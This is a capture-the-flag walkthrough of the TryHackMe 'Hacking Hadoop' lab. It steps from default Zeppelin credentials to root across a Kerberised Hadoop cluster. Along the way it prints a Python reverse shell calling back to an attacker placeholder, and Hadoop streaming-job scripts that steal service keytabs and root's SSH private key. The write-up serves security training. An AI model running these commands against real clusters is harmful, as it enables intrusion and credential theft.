HACKING HADOOP TryHackMe

Rishabh Rai
8 min read · Mar 4, 2022


LINK TO THE ROOM : https://tryhackme.com/room/hackinghadoop

Download VPN file

Start the machine, then run the VPN file you just downloaded from here while keeping your regular OpenVPN connection running in the background.

Then run the following command:

sudo bash -c "echo '<MACHINE IP> thm_hadoop_network.net' >> /etc/hosts"

Now we can check if everything is set up.
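A quick sanity check (assuming ICMP is allowed on the network) is to ping the hostname we just added:

ping -c 1 thm_hadoop_network.net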

Let’s get to the questions now:

TASK 2 : Understanding the datalake

Which node is responsible for actively keeping the directory tree structure of the datalake?

Primary NameNode

What type of node provides applications for users?

Edge Node

What Hadoop service is responsible for scheduling jobs?

YARN

What Hadoop service provides granular access control to resources?

Ranger

What is the term provided to a datalake that makes use of Kerberos for security?

kerberised

Who owns the largest Hadoop cluster in the world?

Facebook

TASK 3 : All aboard the Hindenburg

I scanned the host 172.23.0.3 with:

nmap 172.23.0.3 -p- --min-rate 1000 -sCV

What edge node service is running on this host?

zeppelin

What file is responsible for the authentication configuration for this service?

Hint: since Apache Zeppelin is open source, Google "Apache Zeppelin authentication" and it will point you in the right direction.

shiro.ini

What is the username and password combination that gives you your initial entry?

I tried admin first, but that account is not active (as the hint says); then user1 worked.

user1:password2
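For context, Zeppelin's default shiro.ini template defines users in a plain [users] block like the one below. The room's exact file contents are an assumption on my part, but user1:password2 matches the stock template, and presumably the admin line is commented out (which is why admin is "not active"):

[users]
#admin = password1, admin
user1 = password2, role1, role2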

Let's sign in with these creds by going to http://172.23.0.3:8080.

Once authenticated, submit the flag that is hiding nicely in one of the notebooks.

flag in the NOTEBOOKS

After signing in, we can go to the TESTNODE notebook and see the flag right there.
PS: don't rush for the revshell; grab this flag first 🥸.

THM{*********************}

TASK 4 : Rocking It Like Led

What is the password of the user allowed to interface with the interpreters and provided notebook?

In the same notebook from Task 3, if you scroll down you can find it.

p@ssw0rd12345

Which active interpreter can be used to execute code?

python

Now that we have the username and password, let's escalate our privileges horizontally: create a new note, set the interpreter to python, and paste in our reverse-shell code.
Now all that is left is to hit run.

CODE:

import socket,os,pty
# connect back to our listener (fill in your attacking machine's IP and port)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<attacker IP>",<port>))
# point stdin, stdout and stderr at the socket, then spawn a shell
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/sh")
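Before hitting run, make sure a listener is waiting on your attacking machine (same port as in the payload):

nc -lvnp <port>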

Noiceeee, we have a rev shell on the system. Let's answer some questions then.

What OS user does the application run as?

zp

What is the value of the flag found in the user’s home directory (flag2.txt)?

THM{****************************}

flag2.txt

TASK 5 : Keeping tabs on all these keys

After reading the task, I figured that finding the keytabs is the most important thing to do right now, so I ran a find command to locate the keytab files on the host.

find / -name "*.keytab" 2>/dev/null

Which directory stores the keytabs for the Hadoop services?

/etc/security/keytab

What is the keytab file’s name associated with the compromised user?

zp.service.keytab

What is the first principal stored in this keytab file?

zp/hadoop.docker.com@EXAMPLE.COM
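You can list the principals stored in a keytab with klist's -k flag:

klist -k /etc/security/keytab/zp.service.keytab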

What is the full verbose command to authenticate with this keytab using the full file path?

kinit zp/hadoop.docker.com@EXAMPLE.COM -k -V -t /etc/security/keytab/zp.service.keytab
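Running klist with no arguments afterwards should show the cached ticket for this principal, confirming the authentication worked:

klist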

flag3.txt

What is the value of the flag stored in the compromised user’s HDFS home directory (flag3.txt)?
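With a valid ticket we can read the flag straight out of HDFS. Assuming the home directory follows the same /user/<name> convention as the nm user's does later on:

/usr/local/hadoop-2.7.7/bin/hdfs dfs -cat /user/zp/flag3.txt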

THM{******************}

TASK 6 : A great big ball of Yarn

I used hdfs dfs -touchz to create the input file in /tmp that the upcoming MapReduce streaming jobs need (see the command below).
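The exact command (it gets reused in Task 7 as well):

/usr/local/hadoop-2.7.7/bin/hdfs dfs -touchz /tmp/webhead.txt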

What is the name of the service we will attempt to impersonate for privilege escalation?

yarn

To move ahead, I had to take a look at OPTION 5 of the GitHub link given in the task, which explains how to run remote commands.

What is the value of the flag in the impersonated user’s HDFS home directory (flag4.txt)?

flag4.txt

THM{*************}

  • -input <a non empty file on HDFS>: this will be provided as input to MapReduce for the command to be executed, just put at least a character in that file, this file is useless for our objective
  • -output <a nonexistent directory on HDFS>: this directory will be used by MapReduce to write the result, either _SUCCESS or failure
  • -mapper <your single command>: the command to execute, for instance "/bin/cat /etc/passwd". The output result will be written in the -output directory
  • -reducer NONE: there is no need for a reducer to execute a single command, a mapper is enough

./hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/webhead.txt -output /tmp/webby4 -mapper "/bin/cat /etc/passwd" -reducer NONE

This is the command I used to read /etc/passwd; with a few changes it can read the flag files we are not otherwise permitted to read.

What is the value of the flag in the impersonated user’s OS home directory (flag5.txt)?

./hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/webhead.txt -output /tmp/webby16 -mapper "cat /home/yarn/flag5.txt" -reducer NONE

./hdfs dfs -cat /tmp/webby16/part-00000

flag5.txt

THM{*************}

TASK 7 : Assistant to the regional Node

What is the value of the flag associated with the NodeManager’s HDFS home directory (flag6.txt)?

Let's grab the nm user's keytab to get the next flag.

echo -e '#!/bin/bash' > /tmp/evil.sh
echo -e 'cp /etc/security/keytabs/nm.service.keytab /tmp/nm.service.keytab' >> /tmp/evil.sh
echo -e 'chmod 777 /tmp/nm.service.keytab' >> /tmp/evil.sh

/usr/local/hadoop-2.7.7/bin/hdfs dfs -touchz /tmp/webhead.txt

/usr/local/hadoop/bin/hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/webhead.txt -output /tmp/webby2 -mapper "/tmp/evil.sh" -file /tmp/evil.sh -reducer NONE

klist -k /tmp/nm.service.keytab

kinit nm/hadoop.docker.com@EXAMPLE.COM -k -V -t /tmp/nm.service.keytab

/usr/local/hadoop-2.7.7/bin/hdfs dfs -cat /user/nm/flag6.txt

To get the flag, follow the commands above step by step.

And if you get an error like "output directory /tmp/webby2 already exists", just change the output name from webby2 to something else, like webby3 or webby4. Hope you got it!

flag6.txt

What is the value of the flag associated with the NodeManager’s OS home directory (flag7.txt)?


echo -e '#!/bin/bash' > /tmp/evil2.sh
echo -e 'sudo cp /root/.ssh/id_rsa /tmp/id_rsa_stolen' >> /tmp/evil2.sh
echo -e 'sudo chmod 777 /tmp/id_rsa_stolen' >> /tmp/evil2.sh

/usr/local/hadoop/bin/hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/webhead.txt -output /tmp/webby8 -mapper "/tmp/evil2.sh" -file /tmp/evil2.sh -reducer NONE

I tried to get SSH access to make my misery a little less painful, but even after stealing the id_rsa key 🥸 I was unable to log in.

Then I had to change my approach a little.


echo -e '#!/bin/bash' > /tmp/flag7.sh
echo -e 'cat /home/nm/flag7.txt' >> /tmp/flag7.sh

/usr/local/hadoop/bin/hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/webhead.txt -output /tmp/webby3 -mapper "/tmp/flag7.sh" -file /tmp/flag7.sh -reducer NONE

./hdfs dfs -cat /tmp/webby3/part-00000

Follow these commands as they are and you should get your next flag.

flag7.txt

THM{**********}

TASK 8 : I ❤ root

What is the value of the flag in the root user’s home directory (flag8.txt)?

echo -e '#!/bin/bash' > /tmp/root.sh
echo -e 'sudo cp /root/flag8.txt /tmp/root.txt' >> /tmp/root.sh
echo -e 'sudo chmod 777 /tmp/root.txt' >> /tmp/root.sh

/usr/local/hadoop/bin/hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/webhead.txt -output /tmp/webby33 -mapper "/tmp/root.sh" -file /tmp/root.sh -reducer NONE
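Once the job finishes, the mapper has copied the flag to a world-readable location, so we can simply read it:

cat /tmp/root.txt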

flag8.txt

THM{**********}

PS: this flag was soo trueeeee!!!!!!!

What is the value of the flag in the root user’s HDFS home directory (flag9.txt)?

Same trick as before: create the script first, then run it through a streaming job.

echo -e '#!/bin/bash' > /tmp/evil3.sh
echo -e 'sudo cp /etc/security/keytabs/root.service.keytab /tmp/root.service.keytab' >> /tmp/evil3.sh
echo -e 'sudo chmod 777 /tmp/root.service.keytab' >> /tmp/evil3.sh

/usr/local/hadoop/bin/hadoop jar /usr/local/hadoop-2.7.7/share/hadoop/tools/lib/hadoop-streaming-2.7.7.jar -input /tmp/webhead.txt -output /tmp/webby21 -mapper "/tmp/evil3.sh" -file /tmp/evil3.sh -reducer NONE

klist -k /tmp/root.service.keytab
kinit root@EXAMPLE.COM -k -V -t /tmp/root.service.keytab

/usr/local/hadoop-2.7.7/bin/hdfs dfs -cat flag9.txt

flag9.txt

THM{***********}

TASK 10 : Surfing the datalake

What is the value of the flag in the root user’s directory on the secondary cluster node (flag10.txt)?

The id_rsa key I found earlier turned out to be the SSH key for 172.23.0.4, so I used it and logged in easily. The flag was waiting right there for me.
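For reference, the login looked something like this (the local filename and user are assumptions; ssh also insists the key file is private, hence the chmod):

chmod 600 id_rsa_stolen
ssh -i id_rsa_stolen root@172.23.0.4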

{Thanks Nguyen Van Tien from DISC for helping with this part, because I couldn't have guessed on my own that this was the SSH key for 172.23.0.4 😅}

flag10.txt

AND FINALLY THE ROOM IS COMPLETED!! 🎉🥳

Special thanks to am03bam4n for making this soul-sucking room, guiding me through it, and not letting me go insane haha.

HAPPY HACKING 🥳🥳🥳🎉🎉

linktree: https://linktr.ee/RishabhRai
